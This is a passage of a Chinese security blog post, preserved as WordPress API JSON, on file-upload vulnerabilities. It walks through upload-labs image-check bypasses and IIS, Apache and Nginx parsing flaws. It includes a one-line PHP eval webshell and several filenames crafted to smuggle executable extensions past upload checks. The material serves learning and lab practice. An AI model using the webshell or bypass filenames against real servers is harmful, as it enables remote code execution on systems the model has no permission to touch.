}\n}<\/code><\/pre>\n<p>getimagesize\u8fd9\u4e2a\u51fd\u6570\u529f\u80fd\u4f1a\u5bf9\u76ee\u6807\u6587\u4ef6\u768416\u8fdb\u5236\u53bb\u8fdb\u884c\u4e00\u4e2a\u8bfb\u53d6\uff0c\u53bb\u8bfb\u53d6\u5934\u51e0\u4e2a\u5b57\u7b26\u4e32\u662f\u4e0d\u662f\u7b26\u5408\u56fe\u7247\u7684\u8981\u6c42\u7684\uff0c\u4e0a\u4f20\u56fe\u7247\u9a6c\uff0c\u5199\u5165\u4ee3\u7801\u5230\u56fe\u7247\uff0c\u4f7f\u7528\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u8bbf\u95ee\u8be5\u56fe\u7247\u5730\u5740\u5373\u53ef<\/p>\n<h6><strong>\u7a81\u7834exif_imagetype\u7ed5\u8fc7-upload-labs-15<\/strong><\/h6>\n<pre><code class=\"language-php\">function isImage($filename){\n    $types = &#039;.jpeg|.png|.gif&#039;;\n    if(file_exists($filename)){\n        $info = getimagesize($filename);\n        $ext = image_type_to_extension($info[2]);\n        if(stripos($types,$ext)&gt;=0){\n            return $ext;\n        }else{\n            return false;\n        }\n    }else{\n        return false;\n    }\n}\n\n$is_upload = false;\n$msg = null;\nif(isset($_POST[&#039;submit&#039;])){\n    $temp_file = $_FILES[&#039;upload_file&#039;][&#039;tmp_name&#039;];\n    $res = isImage($temp_file);\n    if(!$res){\n        $msg = &quot;\u6587\u4ef6\u672a\u77e5\uff0c\u4e0a\u4f20\u5931\u8d25\uff01&quot;;\n    }else{\n        $img_path = UPLOAD_PATH.&quot;\/&quot;.rand(10, 99).date(&quot;YmdHis&quot;).$res;\n        if(move_uploaded_file($temp_file,$img_path)){\n            $is_upload = true;\n        } else {\n            $msg = &quot;\u4e0a\u4f20\u51fa\u9519\uff01&quot;;\n        }\n    }\n}<\/code><\/pre>\n<p>exif_imagetype()  \u8bfb\u53d6\u4e00\u4e2a\u56fe\u50cf\u7684\u7b2c\u4e00\u4e2a\u5b57\u8282\u5e76\u68c0\u67e5\u5176\u7b7e\u540d\u3002\u5982\u679c\u53d1\u73b0\u4e86\u6070\u5f53\u7684\u7b7e\u540d\u5219\u8fd4\u56de\u4e00\u4e2a\u5bf9\u5e94\u7684\u5e38\u91cf\uff0c\u5426\u5219\u8fd4\u56de FALSE\u3002\u8fd4\u56de\u503c\u8ddfgetimagesize()  \u8fd4\u56de\u7684\u6570\u7ec4\u4e2d\u7684\u7d22\u5f15 2  \u7684\u503c\u662f\u4e00\u6837\u7684\uff0c\u4f46exif_imagetype\u51fd\u6570\u5feb\u5f97\u591a\uff0c\u540cgetimagesize\u51fd\u6570\u4e00\u6837\uff0c\u4e5f\u662f\u4fee\u6539\u6587\u4ef6\u5934\u4fe1\u606f\uff0c\u914d\u5408\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u4e0a\u4f20<\/p>\n<h5>\u670d\u52a1\u5668\u89e3\u6790\u6f0f\u6d1e<\/h5>\n<h6>IIS 5.x\/6.0\u89e3\u6790\u6f0f\u6d1e<\/h6>\n<p>IIS5.x-6.x:<br \/>\n1\u3001\u76ee\u5f55\u89e3\u6790(6.0):<code>\/1.asp\/1.jpg<\/code>   \u5728\u6b64\u76ee\u5f55\u4e0b\u7684\u4efb\u610f\u6587\u4ef6\uff0c\u670d\u52a1\u5668\u90fd\u89e3\u6790\u4e3aasp\u6587\u4ef6<br \/>\n2\u3001\u6587\u4ef6\u89e3\u6790:<code>1.asp;.jpg<\/code><br \/>\n3\u3001\u6587\u4ef6\u7c7b\u578b:<code>1.asa,a.cer,1.cdx<\/code><\/p>\n<p>IIS7.5\uff1a<br \/>\nIIS7.5\u662f\u7531\u4e8ephp\u914d\u7f6e\u6587\u4ef6\u4e2d\uff0c\u5f00\u542f\u4e86cgi.fix_pathinf<\/p>\n<h6>Apache\u89e3\u6790\u6f0f\u6d1e<\/h6>\n<p>Apache:<br \/>\n\u4ece\u53f3\u5230\u5de6\u5f00\u59cb\u5224\u65ad\u89e3\u6790,\u5982\u679c\u540e\u7f00\u540d\u4e3a\u4e0d\u53ef\u8bc6\u522b\u6587\u4ef6\u89e3\u6790,\u5c31\u518d\u5f80\u5de6\u5224\u65ad<br \/>\n\u540e\u7f00\u4e0d\u8bc6\u522b\uff1a1.php.php123<br \/>\n\u914d\u7f6e\u9519\u8bef\uff1a1.php.jpg<\/p>\n<h6>Nginx\u89e3\u6790\u6f0f\u6d1e<\/h6>\n<p>Nginx\uff1a<br \/>\nNginx\u9ed8\u8ba4\u662f\u4ee5CGI\u7684\u65b9\u5f0f\u652f\u6301PHP\u89e3\u6790\u7684\uff0c\u548cIIS7.5\u4e00\u6837\u5f00\u542f\u4e86cgi.fix_pathinf<br \/>\n1.jpg\/1.php<br \/>\n1.jpg%00.php<br \/>\n1.jpg\/%20\\1.php<br \/>\n\u4e0a\u4f20\u4e00\u4e2a\u540d\u5b57\u4e3atest.jpg\uff0c\u4ee5\u4e0b\u5185\u5bb9\u7684\u6587\u4ef6<br \/>\n&lt;?php @eval($_REQUEST['cmd']);?&gt;<br \/>\n\u7136\u540e\u8bbf\u95eetest.jpg\/.php,\u5728\u8fd9\u4e2a\u76ee\u5f55\u4e0b\u5c31\u4f1a\u751f\u6210\u4e00\u53e5\u8bdd\u6728\u9a6cshell.php<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u7b80\u5355\u4ecb\u7ecd \u539f\u7406\uff1a \u7531\u4e8e\u7a0b\u5e8f\u5458\u5728\u7f16\u5199\u4ee3\u7801\u65f6\u5019\u5728\u5bf9\u7528\u6237\u6587\u4ef6\u4e0a\u4f20\u529f\u80fd\u5b9e\u73b0\u4ee3\u7801\u4e0a\u6ca1\u6709\u4e25\u683c\u9650\u5236\u7528\u6237\u4e0a\u4f20\u7684\u6587\u4ef6\u540e\u7f00\u4ee5\u53ca\u6587\u4ef6\u7c7b\u578b\u6216\u8005\u5904\u7406\u7f3a\u9677,\u800c &#8230;<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-105","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/105","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=105"}],"version-history":[{"count":3,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/105\/revisions"}],"predecessor-version":[{"id":243,"href":"http:\/\/danielw.top\/index.php?rest_route=\/wp\/v2\/posts\/105\/revisions\/243"}],"wp:attachment":[{"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=105"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=105"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/danielw.top\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=105"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}